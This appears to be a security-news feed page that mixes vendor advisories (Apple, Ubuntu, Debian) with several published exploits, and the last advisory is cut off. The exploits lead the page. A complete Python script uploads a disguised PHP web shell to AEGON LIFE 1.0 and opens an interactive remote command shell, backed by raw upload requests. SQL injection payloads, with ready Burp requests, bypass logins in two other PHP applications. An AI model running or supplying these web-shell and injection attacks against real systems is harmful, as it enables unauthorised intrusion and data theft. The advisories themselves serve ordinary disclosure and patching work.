AEGON LIFE version 1.0 suffers from an unauthenticated remote code execution vulnerability.

# Exploit Title:  Life Insurance Management System- Unauthenticated Remote Code Execution (RCE)  
# Exploit Author: Aslam Anwar Mahimkar  
# Date: 18-05-2024  
# Category: Web application  
# Vendor Homepage: https://projectworlds.in/  
# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/  
# Version: AEGON LIFE v1.0  
# Tested on: Linux  
# CVE: CVE-2024-36598

# Description:  
----------------

-An arbitrary file upload vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary code via uploading a crafted PHP file by adding image/gif magic bytes in payload.

-In insertClient.php fileToUpload is only checking for image file but not checking for extensions, also header.php is not properly handling the redirection hence allowing Unauthenticated redirect.

# Payload:  
------------------

payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"

# RCE via executing exploit:  
---------------------------------------

    # Step : run the exploit in python with this command: python3 shell.py  http://localhost/lims/  
    # will lead to RCE shell.

  POC  
-------------------

import argparse  
import random  
import requests  
import string  
import sys

parser = argparse.ArgumentParser()  
parser.add_argument('url', action='store', help='The URL of the target.')  
args = parser.parse_args()

url = args.url.rstrip('/')  
random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))

payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"

file = {'fileToUpload': (random_file + '.php', payload, 'text/php')}  
print('> Attempting to upload PHP web shell...')  
r = requests.post(url + '/insertClient.php', files=file, data={'agent_id':''}, verify=False)  
print('> Verifying shell upload...')  
r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)

if random_file in r.text:  
    print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php')  
    print('> Example command usage: ' + url + '/uploads/' + random_file + '.php?cmd=whoami')  
    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))  
    if launch_shell.lower() == 'y':  
        while True:  
            cmd = str(input('RCE $ '))  
            if cmd == 'exit':  
                sys.exit(0)  
            r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':cmd}, verify=False)  
            print(r.text)  
else:  
    if r.status_code == 200:  
        print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')  
    else:  
        print('> Web shell failed to upload! The web server may not have write permissions.')

---------------------------------------------------------------------------------------------------------------------------

### Can also performed manually.

Payload:  
--------------

GIF89a;  
<?php  
echo"<pre>";  
passthru($_GET['cmd']);  
echo"<pre>";  
?>

# Attack Vectors:  
-------------------------

After uploading malicious image can access it to get the shell

http://localhost/lims/uploads/shell2.gif.php?cmd=id

Burp Suit Request  
-----------------------------

POST /lims/insertClient.php HTTP/1.1  
Host: localhost  
Content-Length: 2197  
Cache-Control: max-age=0  
sec-ch-ua:   
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: ""  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5plGALZGPOOdBlF0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/lims/addClient.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="client_id"

1716015032

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="client_password"

Password

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="name"

Test

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="fileToUpload"; filename="shell2.gif.php"  
Content-Type: application/x-php

GIF89a;  
<?php  
echo"<pre>";  
passthru($_GET['cmd']);  
echo"<pre>";  
?>

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="sex"

Male

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="birth_date"

1/1/1988

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="maritial_status"

M

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nid"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="phone"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="address"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="policy_id"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="agent_id"

Agent007

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_id"

1716015032-275794639

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_name"

Test1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_sex"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_birth_date"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_nid"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_relationship"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="priority"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_phone"

1  
------WebKitFormBoundary5plGALZGPOOdBlF0

AEGON LIFE 1.0 Remote Code Execution

AEGON LIFE version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Life Insurance Management System- SQL injection vulnerability.# Exploit Author: Aslam Anwar Mahimkar# Date: 18-05-2024# Category: Web application# Vendor Homepage: https://projectworlds.in/# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/# Version: AEGON LIFE v1.0# Tested on: Linux# CVE: CVE-2024-36597# Description:----------------Aegon Life v1.0 was discovered to contain a SQL injection vulnerability via the client_id parameter at clientStatus.php.Important user data or system data may be leaked and system security may be compromised. Then environment is secure and the information can be used by malicious users.# Payload:------------------client_id=1511986023%27%20OR%201=1%20--%20a # Steps to reproduce-------------------------- -Login with your creds -Navigate to this directory - /client.php -Click on client Status -Will navigate to /clientStatus.php -Capture the request in burp and inject SQLi query in client_id= filed# Burp Request-------------------GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1Host: localhostsec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78nConnection: close

AEGON LIFE 1.0 SQL Injection

Cisco Talos is disclosing a new malware campaign called “Operation Celestial Force” running since at least 2018. It is still active today, employing the use of GravityRAT, an Android-based malware, along with a Windows-based malware loader we track as “HeavyLift.”

Operation Celestial Force employs mobile and desktop malware to target Indian entities

Apple Security Advisory 06-10-2024-1 - visionOS 1.2 addresses bypass, code execution, integer overflow, out of bounds access, out of bounds read, and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-06-10-2024-1 visionOS 1.2

visionOS 1.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT214108.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

CoreMedia  
Available for: Apple Vision Pro  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved checks.  
CVE-2024-27817: pattern-f (@pattern_F_) of Ant Security Light-Year Lab

CoreMedia  
Available for: Apple Vision Pro  
Impact: Processing a file may lead to unexpected app termination or  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-27831: Amir Bazine and Karsten König of CrowdStrike Counter  
Adversary Operations

Disk Images  
Available for: Apple Vision Pro  
Impact: An app may be able to elevate privileges  
Description: The issue was addressed with improved checks.  
CVE-2024-27832: an anonymous researcher

Foundation  
Available for: Apple Vision Pro  
Impact: An app may be able to elevate privileges  
Description: The issue was addressed with improved checks.  
CVE-2024-27801: CertiK SkyFall Team

ImageIO  
Available for: Apple Vision Pro  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution  
Description: The issue was addressed with improved checks.  
CVE-2024-27836: Junsung Lee working with Trend Micro Zero Day Initiative

IOSurface  
Available for: Apple Vision Pro  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-27828: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

Kernel  
Available for: Apple Vision Pro  
Impact: An attacker that has already achieved kernel code execution may  
be able to bypass kernel memory protections  
Description: The issue was addressed with improved memory handling.  
CVE-2024-27840: an anonymous researcher

Kernel  
Available for: Apple Vision Pro  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-27815: an anonymous researcher, and Joseph Ravichandran  
(@0xjprx) of MIT CSAIL

libiconv  
Available for: Apple Vision Pro  
Impact: An app may be able to elevate privileges  
Description: The issue was addressed with improved checks.  
CVE-2024-27811: Nick Wellnhofer

Messages  
Available for: Apple Vision Pro  
Impact: Processing a maliciously crafted message may lead to a denial-  
of-service  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-27800: Daniel Zajork and Joshua Zajork

Metal  
Available for: Apple Vision Pro  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination or arbitrary code execution  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-27802: Meysam Firouzi (@R00tkitsmm) working with Trend Micro  
Zero Day Initiative

Metal  
Available for: Apple Vision Pro  
Impact: A remote attacker may be able to cause unexpected app  
termination or arbitrary code execution  
Description: An out-of-bounds access issue was addressed with improved  
bounds checking.  
CVE-2024-27857: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

Safari  
Available for: Apple Vision Pro  
Impact: A website's permission dialog may persist after navigation away  
from the site  
Description: The issue was addressed with improved checks.  
CVE-2024-27844: Narendra Bhati of Suma Soft Pvt. Ltd in Pune (India),  
Shaheen Fazim

WebKit  
Available for: Apple Vision Pro  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: The issue was addressed by adding additional logic.  
WebKit Bugzilla: 262337  
CVE-2024-27838: Emilio Cobos of Mozilla

WebKit  
Available for: Apple Vision Pro  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 268221  
CVE-2024-27808: Lukas Bernhard of CISPA Helmholtz Center for Information  
Security

WebKit  
Available for: Apple Vision Pro  
Impact: Processing web content may lead to a denial-of-service  
Description: The issue was addressed with improvements to the file  
handling protocol.  
CVE-2024-27812: Ryan Pickren (ryanpickren.com)

WebKit  
Available for: Apple Vision Pro  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: This issue was addressed with improvements to the noise  
injection algorithm.  
WebKit Bugzilla: 270767  
CVE-2024-27850: an anonymous researcher

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may lead to arbitrary  
code execution  
Description: An integer overflow was addressed with improved input  
validation.  
WebKit Bugzilla: 271491  
CVE-2024-27833: Manfred Paul (@_manfp) working with Trend Micro Zero Day  
Initiative

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may lead to arbitrary  
code execution  
Description: The issue was addressed with improved bounds checks.  
WebKit Bugzilla: 272106  
CVE-2024-27851: Nan Wang (@eternalsakura13) of 360 Vulnerability  
Research Institute

WebKit Canvas  
Available for: Apple Vision Pro  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: This issue was addressed through improved state management.  
WebKit Bugzilla: 271159  
CVE-2024-27830: Joe Rutkowski (@Joe12387) of Crawless and @abrahamjuliot

WebKit Web Inspector  
Available for: Apple Vision Pro  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 270139  
CVE-2024-27820: Jeff Johnson of underpassapp.com

Additional recognition

ImageIO  
We would like to acknowledge an anonymous researcher for their  
assistance.

Transparency  
We would like to acknowledge Mickey Jin (@patch1t) for their assistance.

Instructions on how to update visionOS are available at  
https://support.apple.com/HT214009  To check the software version  
on your Apple Vision Pro, open the Settings app and choose General >  
About.  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmZnfN8ACgkQX+5d1TXa  
IvoomBAA23557a2KB9vrRnWu5nGWe5qidODwqadX9qUbErqlx6Hm0IMcKEGlaNjc  
i1BKib0QXYgh9IVzwn0/Q6GZX9mncM1EKJfjPVHJjdMPAXue9Dec7PeuSr4mQHUD  
bVUh9TS+ejQo9w06AQRdVDOGRl3uXX1E90h4uMVUPOXLkiobYJMlEdU4OAAaJ2MV  
qJvfQsTyzRNy4ciaFpc+5opWmaFse1AueE+Sjz30ed9tEjbyHML+yoy39HqAMheT  
lECfaKGLp28XyxsKCKW8+F5j83R4Rwi7U0nLROiRSukrwzq+Gbi52n/BTBvlxTc3  
Ng/4drldksgm9Uu6M9rRQFSRFBFKulK9Zxrj3qUK4Q6HvCTB+N4/gE7Yf11TyxPl  
+HkwG/ScIw9S4bB88FhA8rYMKIGIlZfDfh8NHCx3Wc11LE+p6LzX2RxQNKaSjgnf  
c1+VHJ3SwX/2mbtBdfPJdu5Qr6ofhanpsCiczJP2FkuSVGCPVIoq8Vam75rrueLn  
SLCHqgVker14Z12Q3XYRjyQrsI8nftu0pGZdYruAfw93Od0tTuX6i7G9VopHPRor  
1Y6JevWkhAC54KGWDmB2SRc6e3AZRaiAE25QE6I3nwAwRUCo2JZEjoQWfxYry1l2  
G5lga3qFvcbyriNoJPUfcKU7EzPYurVbY5rqpnUFi+xTtz1iyEw=  
=9AfP  
-----END PGP SIGNATURE-----

Apple Security Advisory 06-10-2024-1

Employee and Visitor Gate Pass Logging System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Employee and Visitor Gate Pass Logging System - SQLi Authentication Bypass# Date: 29.05.2024# Exploit Author: Furkan Eren Tetik# Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code# Version: 1.0# Tested on: Windows 11, Kali Linux# Employee and Visitor Gate Pass Logging System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.Steps To Reproduce:1 - Go to the login page http://localhost/employee_gatepass/admin/login.php2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.3 - Click on "Login" button and you are logged in as administrator.PoCRequestPOST /employee_gatepass/classes/Login.php?f=login HTTP/1.1Host: localhostContent-Length: 43sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/employee_gatepass/admin/login.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9f8v4097jovtf6a3igi4l6479iConnection: closeusername=admin'+or+'1'%3D'1&password=furkan--------------------------------------------------------------------------------------------------------------------------------responseHTTP/1.1 200 OKDate: Wed, 29 May 2024 17:01:26 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30X-Powered-By: PHP/8.0.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Content-Length: 20Connection: closeContent-Type: text/html; charset=UTF-8{"status":"success"}

Employee And Visitor Gate Pass Logging System 1.0 SQL Injection

Online Payment Hub System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Online Payment Hub System - SQLi Authentication Bypass# Date: 29.05.2024# Exploit Author: Hamit Avşar# Vendor Homepage: https://www.sourcecodester.com/php/15018/online-payment-hub-using-php-and-paypal-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=15018&title=Online+Payment+Hub+using+PHP+and+PayPal+Free+Source+Code# Version: 1.0# Tested on: Windows 11, Kali Linux# Online Payment Hub System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.Steps To Reproduce:1 - Go to the login page http://localhost/oph/admin/login.php2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.3 - Click on "Login" button and you are logged in as administrator.PoCRequestPOST /oph/classes/Login.php?f=login HTTP/1.1Host: localhostContent-Length: 42sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/oph/admin/login.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9f8v4097jovtf6a3igi4l6479iConnection: closeusername=admin'+or+'1'%3D'1&password=hamit--------------------------------------------------------------------------------------------------------------------------------responseHTTP/1.1 200 OKDate: Wed, 29 May 2024 17:15:28 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30X-Powered-By: PHP/8.0.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Content-Length: 20Connection: closeContent-Type: text/html; charset=UTF-8{"status":"success"}

Online Payment Hub System 1.0 SQL Injection

Ubuntu Security Notice 6788-1 - Several security issues were discovered in the WebKitGTK Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.

==========================================================================  
Ubuntu Security Notice USN-6788-1  
May 28, 2024

webkit2gtk vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in WebKitGTK.

Software Description:  
- webkit2gtk: Web content engine library for GTK+

Details:

Several security issues were discovered in the WebKitGTK Web and JavaScript  
engines. If a user were tricked into viewing a malicious website, a remote  
attacker could exploit a variety of issues related to web browser security,  
including cross-site scripting attacks, denial of service attacks, and  
arbitrary code execution.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   libjavascriptcoregtk-4.1-0      2.44.2-0ubuntu0.24.04.1  
   libjavascriptcoregtk-6.0-1      2.44.2-0ubuntu0.24.04.1  
   libwebkit2gtk-4.1-0             2.44.2-0ubuntu0.24.04.1  
   libwebkitgtk-6.0-4              2.44.2-0ubuntu0.24.04.1

Ubuntu 23.10  
   libjavascriptcoregtk-4.0-18     2.44.2-0ubuntu0.23.10.1  
   libjavascriptcoregtk-4.1-0      2.44.2-0ubuntu0.23.10.1  
   libjavascriptcoregtk-6.0-1      2.44.2-0ubuntu0.23.10.1  
   libwebkit2gtk-4.0-37            2.44.2-0ubuntu0.23.10.1  
   libwebkit2gtk-4.1-0             2.44.2-0ubuntu0.23.10.1  
   libwebkitgtk-6.0-4              2.44.2-0ubuntu0.23.10.1

Ubuntu 22.04 LTS  
   libjavascriptcoregtk-4.0-18     2.44.2-0ubuntu0.22.04.1  
   libjavascriptcoregtk-4.1-0      2.44.2-0ubuntu0.22.04.1  
   libjavascriptcoregtk-6.0-1      2.44.2-0ubuntu0.22.04.1  
   libwebkit2gtk-4.0-37            2.44.2-0ubuntu0.22.04.1  
   libwebkit2gtk-4.1-0             2.44.2-0ubuntu0.22.04.1  
   libwebkitgtk-6.0-4              2.44.2-0ubuntu0.22.04.1

This update uses a new upstream release, which includes additional bug  
fixes. After a standard system update you need to restart any applications  
that use WebKitGTK, such as Epiphany, to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6788-1  
   CVE-2024-27834

Package Information:  
   https://launchpad.net/ubuntu/+source/webkit2gtk/2.44.2-0ubuntu0.24.04.1  
   https://launchpad.net/ubuntu/+source/webkit2gtk/2.44.2-0ubuntu0.23.10.1  
   https://launchpad.net/ubuntu/+source/webkit2gtk/2.44.2-0ubuntu0.22.04.1

Ubuntu Security Notice USN-6788-1

Debian Linux Security Advisory 5695-1 - Manfred Paul discovered that an attacker with arbitrary read and write capability may be able to bypass Pointer Authentication in the WebKitGTK web engine.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5695-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
May 22, 2024                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2024-27834

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2024-27834

   Manfred Paul discovered that an attacker with arbitrary read and  
   write capability may be able to bypass Pointer Authentication.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2.44.2-1~deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 2.44.2-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmZNsSQACgkQAAyEYu0C  
2AL2wxAAnx+ORCkML2MQZukV0lBt7yHzBHWaZHDWF8C3hbo8DPxqpNPGSRwpLb6M  
xzRbW+7LvdlQUuSEMs0ms00jh1wkmQh1cAa09n778+pYhu5oLm09HOU51ybWaWRM  
gojJiHC6svqhov5vxtqbSTUrpXzGQhp9ZYUAyCI49eJSzROIdk188CHHY1PxHZH1  
nwlQddTeaL63f+0nyXzHomFtgOhyA6ESmVgunS8/yoIxQUOn3T6MQOvdKlizMJAr  
watZ4fQq69AEqFMC2x8cCIZ6zZAhu4dLwagnundEdwZxeKRa6vAv6N5BLFx9lC8q  
HARmaMttDl1+3AMHwMiZDqdNt++L4Ldgy26PJQa8hsDlAmXQsR5qtR/xmS7+l6AN  
euXWeyF2DBM3GZgRzsACFJsnqYkQ9snQZdSYzHi2//xyskTpyHxYwMp/wFp4Kirt  
F05d66TocWkWviuYddytl0cRGb3X1I7pB+8vkw90ugIMJKFxh6cXDDPch6kTdMLg  
YPsSxV8/h1jcxr5MgST1LntvvhgGT70YV9HWJleQ33bmWqEQ6xF7vrIsKy3MiFx1  
jKGoI7GvgOrWRDUIZuw4680f9Hv4Cpz4R0uKMOS4wTbrEQkhv96E/sAcER8P9VYm  
9U6AuFAoA5KRU8BysUD3A/PzHo+wKwTSBUuKUGex8HnPIfmUEyw=  
=yLoR  
-----END PGP SIGNATURE-----

Debian Security Advisory 5695-1

Apple Security Advisory 05-13-2024-8 - tvOS 17.5 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-05-13-2024-8 tvOS 17.5

tvOS 17.5 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT214102.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

AppleAVD  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-27804: Meysam Firouzi (@R00tkitSMM)

AppleMobileFileIntegrity  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker may be able to access user data  
Description: A logic issue was addressed with improved checks.  
CVE-2024-27816: Mickey Jin (@patch1t)

Maps  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to read sensitive location information  
Description: A path handling issue was addressed with improved  
validation.  
CVE-2024-27810: LFY@secsys of Fudan University

RemoteViewServices  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker may be able to access user data  
Description: A logic issue was addressed with improved checks.  
CVE-2024-27816: Mickey Jin (@patch1t)

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker with arbitrary read and write capability may be able  
to bypass Pointer Authentication  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 272750  
CVE-2024-27834: Manfred Paul (@_manfp) working with Trend Micro's Zero  
Day Initiative

Additional recognition

App Store  
We would like to acknowledge an anonymous researcher for their  
assistance.

CoreHAP  
We would like to acknowledge Adrian Cable for their assistance.

Managed Configuration  
We would like to acknowledge 遥遥领先 (@晴天组织) for their assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmZCtmQACgkQX+5d1TXa  
IvpH5hAAtZjOJDsDvmKZhDYNv+q147EOgkWQL99zvmBReygAUqk+KoLQQkkfRLP7  
zTw53l3zvcH5Tar065NTIr/9jW3MDlZ9ipKU5pwy2R6tWRkh5zug6T7WINpcLybv  
6U39illkCn4EOyTZSoET/kkbuu/CQ6QUPC/CX5R/FtBmAmLNcImRjIgHqRjQKVhO  
9ACminYR+gUbsSqn5OfU0hwbvX2pXzqzE8LoOmhgpJyJIbyUUPHt5C6DYmJ79dlf  
Ui0rXKF+kwzqDrAPxph3XhCW0F+IvceREMLefUQXxvQ/0eDZhkCGwyw4/zezoXhg  
k/rAGQ7EEd27AqyDGyRoLpmFvIXafTp3OrePNPnyjE7j06syH4NnkwQoLerdrW9x  
KOCWQYJ9v03SfJpzGQOVA+aP2sHe4jSR4mtq7m7dax6qKjKrLWog7aqu6+pZZ4Ga  
9AXLEU7sQgNF8TWosVgpUmQEas8v3GQflUqjHvczPyPr4T8Br5VhiM8FYj9SWsPb  
mO/57/3kdsaU6DrD1C1mf5SAjFFi65ox78n8hdXOe1B02fvpDOXyz278XBuVMWE0  
CfhrwhXicP0itQp/KtgrnT+iUhkuPieNBiped/KHPfe9YXOfpjGrtcPQfximiYsD  
rGPnxm5tCJPobmTzRUdsu9TSInqUP291SOvkyX1DEQUkIszm6ao=  
=oc3g  
-----END PGP SIGNATURE-----

Apple Security Advisory 05-13-2024-8

Apple Security Advisory 05-13-2024-7 - watchOS 10.5 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-05-13-2024-7 watchOS 10.5

watchOS 10.5 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT214104.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

AppleAVD  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-27804: Meysam Firouzi (@R00tkitSMM)

AppleMobileFileIntegrity  
Available for: Apple Watch Series 4 and later  
Impact: An attacker may be able to access user data  
Description: A logic issue was addressed with improved checks.  
CVE-2024-27816: Mickey Jin (@patch1t)

Maps  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read sensitive location information  
Description: A path handling issue was addressed with improved  
validation.  
CVE-2024-27810: LFY@secsys of Fudan University

RemoteViewServices  
Available for: Apple Watch Series 4 and later  
Impact: An attacker may be able to access user data  
Description: A logic issue was addressed with improved checks.  
CVE-2024-27816: Mickey Jin (@patch1t)

Shortcuts  
Available for: Apple Watch Series 4 and later  
Impact: A shortcut may output sensitive user data without consent  
Description: A path handling issue was addressed with improved  
validation.  
CVE-2024-27821: Kirin (@Pwnrin), zbleet, and Csaba Fitzl (@theevilbit)  
of Kandji

WebKit  
Available for: Apple Watch Series 4 and later  
